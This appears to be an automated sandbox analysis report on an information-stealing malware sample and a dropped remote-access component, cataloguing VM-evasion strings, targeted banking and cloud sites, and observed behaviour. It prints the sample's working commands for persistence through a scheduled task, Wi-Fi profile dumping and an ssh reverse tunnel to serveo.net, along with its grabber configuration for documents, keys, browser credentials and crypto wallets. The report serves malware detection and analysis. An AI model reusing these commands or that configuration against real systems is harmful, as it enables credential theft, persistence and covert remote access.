Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Amcache.hve.36.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.36.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.36.dr Binary or memory string: VMware, Inc.
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: Amcache.hve.36.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.36.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: manager.exe, 0000002A.00000002.4561656216.000000000158B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?6
Source: Amcache.hve.36.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.dr Binary or memory string: qemu'#
Source: Amcache.hve.36.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.36.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.36.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: ssh.exe, 00000018.00000002.4563139619.0000020D735EA000.00000004.00000020.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2640663700.0000019232F75000.00000004.00000020.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3881086049.0000028989870000.00000004.00000020.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4457586264.000001ADB3577000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 0LpFv1haTA.exe, 00000007.00000002.4651451428.0000021F2AE09000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: Amcache.hve.36.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.36.dr Binary or memory string: vmci.syshbin`
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.36.dr Binary or memory string: \driver\vmci,\driver\pci
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Amcache.hve.36.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Amcache.hve.36.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 3
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Users\user\AppData\Roaming\manager.exe "C:\Users\user\AppData\Roaming\manager.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Roaming\manager.exe Process created: C:\Users\user\AppData\Roaming\XenoManager\manager.exe "C:\Users\user\AppData\Roaming\XenoManager\manager.exe"
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c chcp 65001 && timeout /t 3 > nul && schtasks /create /tn "0lpfv1hata" /sc minute /tr "c:\users\user\appdata\local\starlabs\0lpfv1hata.exe" /rl highest /f && del /f /s /q /a "c:\users\user\desktop\0lpfv1hata.exe" &&start "" "c:\users\user\appdata\local\starlabs\0lpfv1hata.exe"
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c chcp 65001 && timeout /t 3 > nul && schtasks /create /tn "0lpfv1hata" /sc minute /tr "c:\users\user\appdata\local\starlabs\0lpfv1hata.exe" /rl highest /f && del /f /s /q /a "c:\users\user\desktop\0lpfv1hata.exe" &&start "" "c:\users\user\appdata\local\starlabs\0lpfv1hata.exe"
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Queries volume information: C:\Users\user\Desktop\0LpFv1haTA.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Queries volume information: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Queries volume information: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Queries volume information: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\manager.exe Queries volume information: C:\Users\user\AppData\Roaming\manager.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Queries volume information: C:\Users\user\AppData\Roaming\XenoManager\manager.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Queries volume information: C:\Users\user\AppData\Roaming\XenoManager\manager.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Queries volume information: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Queries volume information: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Queries volume information: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe VolumeInformation
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: Amcache.hve.36.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.36.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.36.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.36.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: 0LpFv1haTA.exe PID: 1964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 0LpFv1haTA.exe PID: 5500, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 0LpFv1haTA.exe PID: 1964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 0LpFv1haTA.exe PID: 5500, type: MEMORYSTR
Source: Yara match File source: 41.0.manager.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000029.00000000.2648249695.0000000000242000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: manager.exe PID: 8056, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\manager.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe, type: DROPPED
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459C0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: eoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Desktop Files</string></args></command><command name="0"><args><string>%UserProfile%\Documents</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Documents</string></args></command><command 
name="0"><args><string>%UserProfile%\Downloads</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Downloads</string></args></command><command name="6"/> </commands></Commands>g></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><c
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match File source: 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 0LpFv1haTA.exe PID: 1964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 0LpFv1haTA.exe PID: 5500, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: 0LpFv1haTA.exe PID: 1964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 0LpFv1haTA.exe PID: 5500, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 0LpFv1haTA.exe PID: 1964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 0LpFv1haTA.exe PID: 5500, type: MEMORYSTR
Source: Yara match File source: 41.0.manager.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000029.00000000.2648249695.0000000000242000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: manager.exe PID: 8056, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\manager.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe, type: DROPPED